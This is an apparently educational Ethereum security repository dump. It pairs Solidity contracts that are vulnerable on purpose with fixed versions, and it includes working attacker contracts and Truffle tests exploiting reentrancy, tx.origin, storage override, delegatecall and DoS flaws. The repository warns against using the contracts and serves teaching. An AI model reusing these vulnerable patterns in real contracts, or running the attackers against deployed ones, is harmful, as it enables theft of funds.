    "path": "contracts/dos/AuctionFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract AuctionFixed {\n\n    address currentLeader;\n    uint highestBid;\n    mapping(address => uint) refunds;\n\n    function bid() public payable {\n        require(msg.value > highestBid);\n        // there can be an overflow but it is not the point of this contract\n        // having a withdraw pattern instead of just transferring fixes the issue\n        refunds[currentLeader] += highestBid;\n        currentLeader = msg.sender;\n        highestBid = msg.value;\n    }\n\n    function withdraw() public {\n        uint refund = refunds[msg.sender];\n        require(refund > 0);\n        refunds[msg.sender] = 0;\n        msg.sender.transfer(refund);\n    }\n\n    function getCurrentLeader() public view returns (address) {\n        return currentLeader;\n    }\n\n    function getHighestBid() public view returns (uint) {\n        return highestBid;\n    }\n\n    function getRefund(address _bidder) public view returns (uint) {\n        return refunds[_bidder];\n    }\n}\n"
  },
  {
    "path": "contracts/dos_unbound_array/UnboundArray.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract UnboundArray {\n\n    uint[] arr;\n\n    function push(uint _number) public {\n        for (uint i = 0; i < _number; i++) {\n            arr.push(i);\n        }\n    }\n\n    function sum() public view returns (uint) {\n        uint s = 0;\n        for(uint i = 0; i < arr.length; i++) {\n            s+=arr[i];\n        }\n        return s;\n    }\n}\n"
  },
  {
    "path": "contracts/dos_unbound_array/UnboundArrayFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract UnboundArrayFixed {\n\n    uint[] arr;\n\n    function push(uint _number) public {\n        for (uint i = 0; i < _number; i++) {\n            arr.push(i);\n        }\n    }\n\n    // To fix the issue, we can never loop over an unbounded array.\n    // Kind of a pagination, so the frontend can do the logic\n    function sum(uint _start, uint _size) public view returns (uint) {\n        uint s = 0;\n        for(uint i = _start; i < _start + _size && i < arr.length; i++) {\n            s+=arr[i];\n        }\n        return s;\n    }\n}\n"
  },
  {
    "path": "contracts/extcodesize/ExtCodeSize.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract ExtCodeSize {\n\n    // This contract would be 'hacked' if the address saved here is a contract address\n    address public thisIsNotAContract;\n\n    function aContractCannotCallThis() public {\n        uint codeSize;\n        assembly { codeSize := extcodesize(caller) }\n        // If extcodesize returns 0, it means the caller's code length is 0, so, it is not a contract...\n        // or maybe not\n        require(codeSize == 0);\n        thisIsNotAContract = msg.sender;\n    }\n}\n"
  },
  {
    "path": "contracts/extcodesize/ExtCodeSizeAttacker.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./ExtCodeSize.sol\";\n\ncontract ExtCodeSizeAttacker {\n\n    // When ExtCodeSize does extcodesize, since we are calling the function from the constructor, it will return 0\n    // even if this is a contract...\n    constructor(address _victim) {\n        ExtCodeSize victim = ExtCodeSize(_victim);\n        victim.aContractCannotCallThis();\n    }\n}\n"
  },
  {
    "path": "contracts/extcodesize/ExtCodeSizeFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract ExtCodeSizeFixed {\n\n    // This contract would be 'hacked' if the address saved here is a contract address\n    address public thisIsNotAContract;\n\n    function aContractCannotCallThis() public {\n        // a way to check that a contract is not calling this method without relying in extcodesize\n        require(msg.sender == tx.origin);\n        thisIsNotAContract = msg.sender;\n    }\n}\n"
  },
  {
    "path": "contracts/forcether/ForceEtherAttacker.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract ForceEtherAttacker {\n\n    address victim;\n\n    function ForceEtherAttacker(address _victim) public {\n        victim = _victim;\n    }\n\n    function() public payable {\n        selfdestruct(victim);\n    }\n}\n"
  },
  {
    "path": "contracts/forcether/ForceEtherVictim.sol",
    "content": "pragma solidity ^0.4.23;\n\n//\n//  A fix is not provided for this contract.\n//  A contract balance cannot be guaranteed to be zero\n//  even if we perform revert in the fallback function\n//\ncontract ForceEtherVictim {\n\n    address owner;\n\n    function ForceEtherVictim() public {\n        owner = msg.sender;\n    }\n\n    function changeOwner() public {\n        require(this.balance > 0);\n        // this should never be reached, because we cannot (HEH) deposit any ether here\n        // NEVER trust in the invariant this.balance == 0\n        owner = msg.sender;\n    }\n\n    // blocks any payment done to this contract (or tries it)\n    function() public payable {\n        revert();\n    }\n\n    function getOwner() public view returns(address) {\n        return owner;\n    }\n}\n"
  },
  {
    "path": "contracts/overunderflow/OverUnderFlow.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract OverUnderFlow {\n\n    uint public zero = 0;\n    uint public max = 2**256-1;\n\n    function overflow() public {\n        max += 1;\n    }\n\n    function underflow() public {\n        zero -= 1;\n    }\n\n    function getZero() public view returns (uint) {\n        return zero;\n    }\n\n    function getMax() public view returns (uint) {\n        return max;\n    }\n}\n"
  },
  {
    "path": "contracts/overunderflow/OverUnderFlowFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./SafeMath.sol\";\n\ncontract OverUnderFlowFixed {\n\n    using SafeMath for uint;\n\n    uint public zero = 0;\n    uint public max = 2**256-1;\n\n    function overflow() public {\n        max = max.add(1);\n    }\n\n    function underflow() public {\n        zero = zero.sub(1);\n    }\n\n    function getZero() public view returns (uint) {\n        return zero;\n    }\n\n    function getMax() public view returns (uint) {\n        return max;\n    }\n}\n"
  },
  {
    "path": "contracts/overunderflow/SafeMath.sol",
    "content": "pragma solidity ^0.4.18;\n\n/**\n * @title SafeMath\n * @dev Math operations with safety checks that throw on error\n */\nlibrary SafeMath {\n\n    /**\n    * @dev Multiplies two numbers, throws on overflow.\n    */\n    function mul(uint256 a, uint256 b) internal pure returns (uint256) {\n        if (a == 0) {\n            return 0;\n        }\n        uint256 c = a * b;\n        assert(c / a == b);\n        return c;\n    }\n\n    /**\n    * @dev Integer division of two numbers, truncating the quotient.\n    */\n    function div(uint256 a, uint256 b) internal pure returns (uint256) {\n        // assert(b > 0); // Solidity automatically throws when dividing by 0\n        uint256 c = a / b;\n        // assert(a == b * c + a % b); // There is no case in which this doesn't hold\n        return c;\n    }\n\n    /**\n    * @dev Substracts two numbers, throws on overflow (i.e. if subtrahend is greater than minuend).\n    */\n    function sub(uint256 a, uint256 b) internal pure returns (uint256) {\n        assert(b <= a);\n        return a - b;\n    }\n\n    /**\n    * @dev Adds two numbers, throws on overflow.\n    */\n    function add(uint256 a, uint256 b) internal pure returns (uint256) {\n        uint256 c = a + b;\n        assert(c >= a);\n        return c;\n    }\n}"
  },
  {
    "path": "contracts/reentrancy/Reentrancy.sol",
    "content": "pragma solidity ^0.4.23;\n\ninterface Reentrancy {\n    function deposit() public payable;\n    function withdrawAll() public;\n}\n"
  },
  {
    "path": "contracts/reentrancy/ReentrancyAttacker.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./Reentrancy.sol\";\nimport \"./ReentrancyVulnerable.sol\";\n\ncontract ReentrancyAttacker {\n\n    Reentrancy victim;\n\n    function ReentrancyAttacker(address _victimContractAddress) public {\n        victim = ReentrancyVulnerable(_victimContractAddress);\n    }\n\n    function depositInContract() public payable {\n        require(msg.value > 0);\n        victim.deposit.value(msg.value)();\n    }\n\n    function withdraw() public {\n        victim.withdrawAll();\n    }\n\n    function getContractBalance() public view returns (uint) {\n        return this.balance;\n    }\n\n    function() payable public {\n        victim.withdrawAll();\n    }\n}\n"
  },
  {
    "path": "contracts/reentrancy/ReentrancyVulnerable.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./Reentrancy.sol\";\n\ncontract ReentrancyVulnerable is Reentrancy {\n\n    mapping(address => uint) balances;\n\n    function deposit() public payable {\n        balances[msg.sender] += msg.value;\n    }\n\n    function withdrawAll() public {\n        uint amount = balances[msg.sender];\n        require(amount > 0);\n        msg.sender.call.value(balances[msg.sender])();\n        balances[msg.sender] = 0;\n    }\n\n    function checkBalance() public view returns (uint) {\n        return balances[msg.sender];\n    }\n\n    function getContractBalance() public view returns (uint) {\n        return this.balance;\n    }\n}\n"
  },
  {
    "path": "contracts/reentrancy/ReentrancyVulnerableFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./Reentrancy.sol\";\n\ncontract ReentrancyVulnerableFixed is Reentrancy {\n\n    mapping(address => uint) balances;\n\n    function deposit() public payable {\n        balances[msg.sender] += msg.value;\n    }\n\n    function withdrawAll() public {\n        uint amount = balances[msg.sender];\n        require(amount > 0);\n        // This is the only change compared to ReentrancyVulnerable.sol\n        balances[msg.sender] = 0;\n        msg.sender.call.value(amount)();\n    }\n\n    function checkBalance() public view returns (uint) {\n        return balances[msg.sender];\n    }\n\n    function getContractBalance() public view returns (uint) {\n        return this.balance;\n    }\n}\n"
  },
  {
    "path": "contracts/send/WalletSendAttacker.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./WalletSendBug.sol\";\n\ncontract WalletSendAttacker {\n\n    WalletSendBug wallet;\n\n    function WalletSendAttacker(address _wallet) public {\n        wallet = WalletSendBug(_wallet);\n    }\n\n    function deposit() public payable {\n        wallet.deposit.value(msg.value)();\n    }\n\n    function withdraw(uint _amount) public {\n        wallet.withdraw(_amount);\n    }\n\n    function() public payable {\n        // we do not accept payments in this contract, so send() fails\n        revert();\n    }\n}\n"
  },
  {
    "path": "contracts/send/WalletSendBug.sol",
    "content": "pragma solidity ^0.4.23;\n\n// Hypothetical situation where not checking the output of send() function\n// makes this contract to be broken forever.\n// The contract is supposed to be a very simple (and bad designed) wallet\n// holding ether and keeping track of the balance of the users.\ncontract WalletSendBug {\n\n    address owner;\n    mapping(address=> uint) balances;\n    uint totalSupply;\n\n    function WalletSendBug() public {\n        owner = msg.sender;\n        totalSupply = 0;\n    }\n\n    function deposit() public payable {\n        require(msg.value > 0);\n        // we ignore overflows/underflows for this example\n        balances[msg.sender] += msg.value;\n        totalSupply += msg.value;\n        assert(this.balance == totalSupply);\n    }\n\n    function withdraw(uint _amount) public {\n        assert(this.balance == totalSupply);\n        require(balances[msg.sender] >= _amount);\n        // we ignore overflows/underflows for this example\n        balances[msg.sender] -= _amount;\n        totalSupply -= _amount;\n        msg.sender.send(_amount);\n    }\n\n    function balanceOf(address _address) public view returns(uint) {\n        return balances[_address];\n    }\n\n    function getTotalSupply() public view returns(uint) {\n        return totalSupply;\n    }\n}\n"
  },
  {
    "path": "contracts/send/WalletSendBugFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract WalletSendBugFixed {\n\n    address owner;\n    mapping(address=> uint) balances;\n    uint totalSupply;\n\n    function WalletSendBug() public {\n        owner = msg.sender;\n        totalSupply = 0;\n    }\n\n    function deposit() public payable {\n        require(msg.value > 0);\n        // we ignore overflows/underflows for this example\n        balances[msg.sender] += msg.value;\n        totalSupply += msg.value;\n        assert(this.balance == totalSupply);\n    }\n\n    function withdraw(uint _amount) public {\n        assert(this.balance == totalSupply);\n        require(balances[msg.sender] >= _amount);\n        // we ignore overflows/underflows for this example\n        balances[msg.sender] -= _amount;\n        totalSupply -= _amount;\n        msg.sender.transfer(_amount);\n    }\n\n    function balanceOf(address _address) public view returns(uint) {\n        return balances[_address];\n    }\n\n    function getTotalSupply() public view returns(uint) {\n        return totalSupply;\n    }\n}\n"
  },
  {
    "path": "contracts/storageoverride/StorageVictim.sol",
    "content": "pragma solidity ^0.4.23;\n\n// Useless contract with not much sense, just to demonstrate the override\ncontract StorageVictim {\n\n    address owner;\n\n    struct Storage {\n        address user;\n        uint amount;\n    }\n\n    mapping(address => Storage) storages;\n\n    function StorageVictim() public {\n        owner = msg.sender;\n    }\n\n    function store(uint _amount) public {\n        // uninitialised pointer. str.user points to the storage address 0 which is \"owner\"\n        Storage str;\n        str.user = msg.sender;\n        str.amount = _amount;\n        storages[msg.sender] = str;\n    }\n\n    function getStore() public view returns (address, uint) {\n        Storage str = storages[msg.sender];\n        return (str.user, str.amount);\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n}\n"
  },
  {
    "path": "contracts/storageoverride/StorageVictimFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract StorageVictimFixed {\n\n    address owner;\n\n    struct Storage {\n        address user;\n        uint amount;\n    }\n\n    mapping(address => Storage) storages;\n\n    function StorageVictimFixed() public {\n        owner = msg.sender;\n    }\n\n    function store(uint _amount) public {\n        // FIXED\n        Storage memory str;\n        str.user = msg.sender;\n        str.amount = _amount;\n        storages[msg.sender] = str;\n    }\n\n    function getStore() public view returns (address, uint) {\n        Storage str = storages[msg.sender];\n        return (str.user, str.amount);\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n}\n"
  },
  {
    "path": "contracts/txorigin/TxOriginAttacker.sol",
    "content": "pragma solidity ^0.4.23;\n\nimport \"./TxOriginVictim.sol\";\n\ncontract TxOriginAttacker {\n\n    address owner;\n    TxOriginVictim victim;\n\n    function TxOriginAttacker(address _victim, address _owner) public {\n        owner = _owner;\n        victim = TxOriginVictim(_victim);\n    }\n\n    function() public payable {\n        victim.transferTo(owner, address(victim).balance);\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n}\n"
  },
  {
    "path": "contracts/txorigin/TxOriginVictim.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract TxOriginVictim {\n\n    address owner;\n\n    function TxOriginVictim() public {\n        owner = msg.sender;\n    }\n\n    function transferTo(address _to, uint amount) public {\n        // only owner can transfer (hehe)\n        require(tx.origin == owner);\n        _to.transfer(amount);\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n\n    function() public payable {\n    // just to allow deposits\n    }\n}\n"
  },
  {
    "path": "contracts/txorigin/TxOriginVictimFixed.sol",
    "content": "pragma solidity ^0.4.23;\n\ncontract TxOriginVictimFixed {\n\n    address owner;\n\n    function TxOriginVictimFixed() public {\n        owner = msg.sender;\n    }\n\n    function transferTo(address _to, uint amount) public {\n        // only owner can transfer (hehe)\n        require(msg.sender == owner);\n        _to.transfer(amount);\n    }\n\n    function getOwner() public view returns (address) {\n        return owner;\n    }\n\n    function() public payable {\n    // just to allow deposits\n    }\n}\n"
  },
  {
    "path": "migrations/1_initial_migration.js",
    "content": "var Migrations = artifacts.require(\"./Migrations.sol\");\n\nmodule.exports = function(deployer) {\n  deployer.deploy(Migrations);\n};\n"
  },
  {
    "path": "migrations/2_migration.js",
    "content": "var OverUnderFlow = artifacts.require(\"./OverUnderFlow.sol\");\nvar OverUnderFlowFixed = artifacts.require(\"./OverUnderFlowFixed.sol\");\nvar ReentrancyVulnerable = artifacts.require(\"./ReentrancyVulnerable.sol\");\nvar ReentrancyVulnerableFixed = artifacts.require(\"./ReentrancyVulnerableFixed.sol\");\nvar WalletLibrary = artifacts.require(\"./WalletLibrary.sol\");\nvar WalletLibraryFixed = artifacts.require(\"./WalletLibraryFixed.sol\");\nvar Auction = artifacts.require(\"./Auction.sol\");\nvar AuctionFixed = artifacts.require(\"./AuctionFixed.sol\");\nvar ForceEtherVictim = artifacts.require(\"./ForceEtherVictim.sol\");\nvar TxOriginVictim = artifacts.require(\"./TxOriginVictim.sol\");\nvar TxOriginVictimFixed = artifacts.require(\"./TxOriginVictimFixed.sol\");\nvar UnboundArray = artifacts.require(\"./UnboundArray.sol\");\nvar UnboundArrayFixed = artifacts.require(\"./UnboundArrayFixed.sol\");\nvar WalletSendBug = artifacts.require(\"./WalletSendBug.sol\");\nvar WalletSendBugFixed = artifacts.require(\"./WalletSendBugFixed.sol\");\nvar StorageVictim = artifacts.require(\"./StorageVictim.sol\");\nvar StorageVictimFixed = artifacts.require(\"./StorageVictimFixed.sol\");\n\nmodule.exports = function(deployer) {\n\n  deployer.deploy(OverUnderFlow);\n  deployer.deploy(OverUnderFlowFixed);\n  deployer.deploy(ReentrancyVulnerable);\n  deployer.deploy(ReentrancyVulnerableFixed);\n  deployer.deploy(WalletLibrary);\n  deployer.deploy(WalletLibraryFixed);\n  deployer.deploy(Auction);\n  deployer.deploy(AuctionFixed);\n  deployer.deploy(ForceEtherVictim);\n  deployer.deploy(TxOriginVictim);\n  deployer.deploy(TxOriginVictimFixed);\n  deployer.deploy(UnboundArray);\n  deployer.deploy(UnboundArrayFixed);\n  deployer.deploy(WalletSendBug);\n  deployer.deploy(WalletSendBugFixed);\n  deployer.deploy(StorageVictim);\n  deployer.deploy(StorageVictimFixed);\n\n};\n"
  },
  {
    "path": "package.json",
    "content": "{\n  \"name\": \"ethereum-security\",\n  \"version\": \"1.0.0\",\n  \"description\": \"## :exclamation: :warning: DO NOT USE THE CONTRACTS IN THIS REPOSITORY. THEY ARE VULNERABLE TO SECURITY BUGS. :warning: :exclamation:\",\n  \"main\": \"truffle-config.js\",\n  \"directories\": {\n    \"test\": \"test\"\n  },\n  \"dependencies\": {\n    \"bignumber.js\": \"^6.0.0\",\n    \"truffle\": \"^5.0.44\"\n  },\n  \"devDependencies\": {},\n  \"scripts\": {\n    \"test\": \"./node_modules/truffle/build/cli.bundled.js test\"\n  },\n  \"repository\": {\n    \"type\": \"git\",\n    \"url\": \"git+https://github.com/fergarrui/ethereum-security.git\"\n  },\n  \"author\": \"\",\n  \"license\": \"ISC\",\n  \"bugs\": {\n    \"url\": \"https://github.com/fergarrui/ethereum-security/issues\"\n  },\n  \"homepage\": \"https://github.com/fergarrui/ethereum-security#readme\"\n}\n"
  },
  {
    "path": "test/arraystorageoverride/arrayStorageOverride.js",
    "content": "var BigNumber = require('bignumber.js');\nvar ArrayStorageOverride = artifacts.require(\"./ArrayStorageOverride.sol\");\n\ncontract(\"Array storage override test\", (accounts) => {\n\n    it(\"Test override\", async () => {\n\n        var victim = await ArrayStorageOverride.new();\n\n        var isHacked = await victim.isHacked.call();\n        assert.isFalse(isHacked);\n        var size = await victim.size.call();\n        assert.equal(0, size);\n\n        var maxNumber = new BigNumber(2).pow(256).minus(1);\n        // in a dynamic array, the data pointer is at the keccak256(p) where p is the storage position where it should\n        // be if it was a normal type, in this case: 1\n        var arrayDataPointer = web3.sha3(\"0x0000000000000000000000000000000000000000000000000000000000000001\", {encoding: 'hex'});\n        var arrayDataPointerNumber = new BigNumber(arrayDataPointer)\n        // when something is inserted into the array, we want to use this offset, to make the index\n        // to overflow and go back to the position 0, so we can point at the storage at 0 and modify it\n        var offset = maxNumber.minus(arrayDataPointerNumber).plus(1);\n        // we pop an element in the array, the length is 0, to it will decrement and underflow\n        await victim.pop();\n        var size = await victim.size.call();\n        // checking that now the size of the array is 2^256-1 because of the underflow, so we control the whole thing\n        assert.isTrue(size.equals(maxNumber));\n        // just double checking that the isHacked bool is still not modified\n        var isHacked = await victim.isHacked.call();\n        assert.isFalse(isHacked);\n        // here, since the length of the array is the max number possible with 32 bytes, we can insert at any index.\n        // if we insert at index 0, then, the value would be inserted at the storage position keccak256(0x1). So, since\n        // we want to modify the position 0, we need to overflow it. Whatever index we enter will be added to the result\n        // of keccak256(1), so if we use: ((2^256-1) - keccak256(1)) + 1, we have an overflow and it will put the value\n        // at the position 0 of the storage, which is the variable isHacked in the contract.\n        await victim.insert(\"0x\" + offset.toString(16), 0x1);\n        var isHacked = await victim.isHacked.call();\n        // Pwned\n        assert.isTrue(isHacked);\n    });\n});\n"
  },
  {
    "path": "test/arraystorageoverride/arrayStorageOverrideFixed.js",
    "content": "var BigNumber = require('bignumber.js');\nvar ArrayStorageOverride = artifacts.require(\"./ArrayStorageOverrideFixed.sol\");\n\ncontract(\"Array storage override test\", (accounts) => {\n\n    it(\"Test override\", async () => {\n\n        var victim = await ArrayStorageOverride.new();\n\n        var isHacked = await victim.isHacked.call();\n        assert.isFalse(isHacked);\n        var size = await victim.size.call();\n        assert.equal(0, size);\n\n        var maxNumber = new BigNumber(2).pow(256).minus(1);\n        var arrayDataPointer = web3.sha3(\"0x0000000000000000000000000000000000000000000000000000000000000001\", {encoding: 'hex'});\n        var arrayDataPointerNumber = new BigNumber(arrayDataPointer)\n        var offset = maxNumber.minus(arrayDataPointerNumber).plus(1);\n        try {\n            // we cannot pop if the size is not 0\n            await victim.pop();\n            assert(false);\n        } catch (error) {\n            assert.include(error.message, \"revert\");\n        }\n        var size = await victim.size.call();\n        assert.equal(0, size);\n        var isHacked = await victim.isHacked.call();\n        assert.isFalse(isHacked);\n        try {\n            // now, since the size is 0, we cannot insert at an arbitrary index, so this will also fail\n            await victim.insert(\"0x\" + offset.toString(16), 0x1);\n            assert(false);\n        } catch (error) {\n            assert.include(error.message, \"revert\");\n        }\n        var isHacked = await victim.isHacked.call();\n        // No luck this time\n        assert.isFalse(isHacked);\n    });\n});\n"
  },
  {
    "path": "test/delegatecall/delegateCallTest.js",
    "content": "var WalletLibrary = artifacts.require(\"./WalletLibrary.sol\");\nvar Wallet = artifacts.require(\"./Wallet.sol\");\n\ncontract(\"Wallet delegate\", (accounts) => {\n\n    var library;\n    var wallet;\n    it(\"Test Delegate bug\", () => {\n         return WalletLibrary.deployed().then(instanceLibrary => {\n            library = instanceLibrary;\n            return library.address;\n         }).then(address => {\n            return Wallet.new(address);\n         }).then(instanceWallet => {\n            wallet = instanceWallet;\n         }).then(() => {\n            return wallet.getOwner.call();\n         }).then(walletOwner => {\n            // check that the wallet was properly initialized having owner == accounts[0]\n            assert.equal(walletOwner, accounts[0]);\n            return library.getOwner.call();\n         }).then(libraryOwner => {\n            // the library owner was not set, because delegatecall modifies the storage of the caller\n            assert.equal(libraryOwner, 0x0);\n            // calculating the function id of initWallet\n            var functionHash = web3.sha3(\"initWallet(address)\").slice(0, 10);\n            // passing accounts[2] as argument. Adding 0s to make it 32 bytes long\n            var functionArgument = \"000000000000000000000000\" + accounts[2].slice(2, accounts[2].length);\n            var _data = functionHash + functionArgument;\n            // calling the fallback function of Wallet.sol passing as msg.data the necessary\n            // input to call initWallet from there\n            return web3.eth.sendTransaction({\n                from: accounts[1],\n                to: wallet.address,\n                data: _data,\n                value: 0,\n                gas: 200000\n            });\n         }).then((result) => {\n            return wallet.getOwner.call();\n         }).then(walletOwner => {\n            // checking that the new owner of Wallet.sol is accounts[2]\n            assert.equal(walletOwner, accounts[2]);\n        });\n    });\n});\n"
  },
  {
    "path": "test/delegatecall/delegateCallTestFixed.js",
    "content": "var WalletLibraryFixed = artifacts.require(\"./WalletLibraryFixed.sol\");\nvar Wallet = artifacts.require(\"./Wallet.sol\");\n\ncontract(\"Wallet delegate fixed\", (accounts) => {\n\n    var library;\n    var wallet;\n    it(\"Test Delegate bug fixed\", () => {\n         return WalletLibraryFixed.deployed().then(instanceLibrary => {\n            library = instanceLibrary;\n            return library.address;\n         }).then(address => {\n            return Wallet.new(address);\n         }).then(instanceWallet => {\n            wallet = instanceWallet;\n         }).then(() => {\n            return wallet.getOwner.call();\n         }).then(walletOwner => {\n            // check that the wallet was properly initialized having owner == accounts[0]\n            assert.equal(walletOwner, accounts[0]);\n            return library.getOwner.call();\n         }).then(libraryOwner => {\n            // the library owner was not set, because delegatecall modifies the storage of the caller\n            assert.equal(libraryOwner, 0x0);\n            // calculating the function id of initWallet2\n            var functionHash = web3.sha3(\"initWallet(address)\").slice(0, 10);\n            // passing accounts[2] as argument. Adding 0s to make it 32 bytes long\n            var functionArgument = \"000000000000000000000000\" + accounts[2].slice(2, accounts[2].length);\n            var _data = functionHash + functionArgument;\n            // calling the fallback function of Wallet.sol passing as msg.data the necessary\n            // input to call initWallet from there\n            return web3.eth.sendTransaction({\n                from: accounts[1],\n                to: wallet.address,\n                data: _data,\n                value: 0,\n                gas: 200000\n            });\n         }).then((result) => {\n            return wallet.getOwner.call();\n         }).then(walletOwner => {\n            // checking that the new owner of Wallet.sol is accounts[0] (the hack didn't succeed)\n            assert.equal(walletOwner, accounts[0]);\n        });\n    });\n});\n"
  },
  {
    "path": "test/dos/dosTest.js",
    "content": "var Auction = artifacts.require(\"./Auction.sol\");\nvar AuctionAttacker = artifacts.require(\"./AuctionAttacker.sol\");\n\ncontract(\"Auction DOS\", (accounts) => {\n\n    var auction;\n    var attacker;\n\n    it(\"Test Auction DOS\", () => {\n\n        return Auction.deployed().then(instance => {\n            auction = instance;\n            return auction.address;\n        }).then(address => {\n            return AuctionAttacker.new(address);\n        }).then((instanceAttacker => {\n            attacker = instanceAttacker;\n            // acounts[0] bids 1\n            return auction.bid({value:1, from: accounts[0]});\n        })).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then(currentLeader => {\n            assert.equal(accounts[0], currentLeader);\n            return auction.getHighestBid.call();\n        }).then(highestBid => {\n            assert.equal(1, highestBid);\n            // acounts[1] bids 2\n            return auction.bid({value:2, from: accounts[1]});\n        }).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then(currentLeader => {\n            assert.equal(accounts[1], currentLeader);\n            return auction.getHighestBid.call();\n        }).then(highestBid => {\n            assert.equal(2, highestBid);\n            // attacker contract bids 3\n            attacker.bidAuction({value : 3});\n        }).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then(currentLeader => {\n            assert(attacker.address, currentLeader)\n            return auction.getHighestBid.call();\n        }).then((highestBid) => {\n            assert(3, highestBid);\n            // acounts[2] bids 4\n            return auction.bid({value:4, from: accounts[2]});\n        }).then(() => {\n            assert(false, \"Should not reach this block\");\n        }).catch((error) => {\n            assert(true, \"Operation reverted\");\n            return auction.getCurrentLeader.call();\n        }).then((currentLeader) => {\n            assert.equal(attacker.address, currentLeader);\n        });\n    });\n});\n"
  },
  {
    "path": "test/dos/dosTestFixed.js",
    "content": "var AuctionFixed = artifacts.require(\"./AuctionFixed.sol\");\nvar AuctionAttacker = artifacts.require(\"./AuctionAttacker.sol\");\n\ncontract(\"Auction DOS Fixed\", (accounts) => {\n\n    var auction;\n    var attacker;\n\n    it(\"Test Auction DOS Fixed\", () => {\n\n        return AuctionFixed.deployed().then(instance => {\n            auction = instance;\n            return auction.address;\n        }).then(address => {\n            return AuctionAttacker.new(address);\n        }).then((instanceAttacker => {\n            attacker = instanceAttacker;\n            // acounts[0] bids 1\n            return auction.bid({value:1, from: accounts[0]});\n        })).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then(currentLeader => {\n            assert.equal(accounts[0], currentLeader);\n            return auction.getHighestBid.call();\n        }).then(highestBid => {\n            assert.equal(1, highestBid);\n            // acounts[1] bids 2\n            return auction.bid({value:2, from: accounts[1]});\n        }).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then(currentLeader => {\n            assert.equal(accounts[1], currentLeader);\n            return auction.getHighestBid.call();\n        }).then(highestBid => {\n            assert.equal(2, highestBid);\n            return auction.getRefund(accounts[0]);\n        }).then(refunds => {\n            assert.equal(1, refunds)\n            return auction.getRefund(accounts[1]);\n        }).then(refunds => {\n            assert.equal(0, refunds)\n            // attacker contract bids 3\n            attacker.bidAuction({value : 3});\n        }).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then(currentLeader => {\n            assert(attacker.address, currentLeader)\n            return auction.getHighestBid.call();\n        }).then((highestBid) => {\n            assert(3, highestBid);\n            return auction.getRefund(accounts[1]);\n        }).then(refunds => {\n            assert(2, refunds);\n            // acounts[2] bids 4\n            return auction.bid({value:4, from: accounts[2]});\n        }).then(() => {\n            return auction.getCurrentLeader.call();\n        }).then((currentLeader) => {\n            // now accounts[2] is the leader, so the attacker contract\n            // is not stuck forever\n            assert.equal(accounts[2], currentLeader);\n            return auction.getRefund(attacker.address);\n        }).then((refunds => {\n            assert.equal(3, refunds);\n        }));\n    });\n});\n"
  },
  {
    "path": "test/dos_unbound_array/dosUnboundArrayTest.js",
    "content": "var UnboundArray = artifacts.require(\"./UnboundArray.sol\");\n\ncontract(\"Unbound array test\", (accounts) => {\n\n    var victim;\n\n    it(\"Test unbound array\", () => {\n        return UnboundArray.deployed().then(instance => {\n            victim = instance;\n        }).then(() => {\n            return victim.push(100);\n        }).then(() => {\n            // Empirically I saw that to run sum() with 100 elements in the array,\n            // it uses 98427 gas. So from now on, let's simulate the max gas per block is 98427\n            // when running sum() to make things simpler\n            return victim.sum({gas: 98427});\n        }).then(sum => {\n            // the sum from 1 to 99 is 4950\n            assert.equal(4950, sum);\n            // we push one more item into the array\n            return victim.push(1);\n        }).then(() => {\n            return victim.sum({gas: 98427});\n        }).then(() => {\n            assert(false, \"It should not reach this block because of out of gas\");\n        }).catch(error => {\n            // sum() needs to do an additional iteration, so we reach the gas limit and fail\n            assert(true, \"Error thrown, we were expecting an out of gas error\");\n        });\n    });\n});\n"
  },
  {
    "path": "test/dos_unbound_array/dosUnboundArrayTestFixed.js",
    "content": "var UnboundArrayFixed = artifacts.require(\"./UnboundArrayFixed.sol\");\n\ncontract(\"Unbound array test Fixed\", (accounts) => {\n\n    var victim;\n\n    it(\"Test unbound array Fixed\", () => {\n        return UnboundArrayFixed.deployed().then(instance => {\n            victim = instance;\n        }).then(() => {\n            return victim.push(100);\n        }).then(() => {\n            // the gas cost is a bit higher since we added an additional check in the for loop\n            // but that's not the important point here\n            // We calculate the sum in bulks instead of doing it for the whole\n            // unbounded array, that would lead us to an out of gas error at some point\n            return victim.sum(0, 100, {gas: 102352});\n        }).then(sum => {\n            // the sum from 1 to 99 is 4950\n            assert.equal(4950, sum);\n            // we push two more items more into the array [0, 1]\n            return victim.push(2);\n        }).then(() => {\n            // Checking that obviously we don't run out of gas\n            // (redundant assertion but just double checking for better understanding)\n            return victim.sum(0, 100, {gas: 102352});\n        }).then((sum) => {\n            assert.equal(4950, sum);\n            // starting now in index 100 instead of 0, so the frontend would take care\n            // of doing the calls in a paginated way and compute the partial results\n            return victim.sum(100, 100, {gas: 102352});\n        }).then(sum => {\n            // we pushed [0,1] at the end of the array, so the sum of those is 1\n            assert.equal(1, sum);\n        });\n    });\n});\n"
  },
  {
    "path": "test/extcodesize/extCodeSizeTest.js",
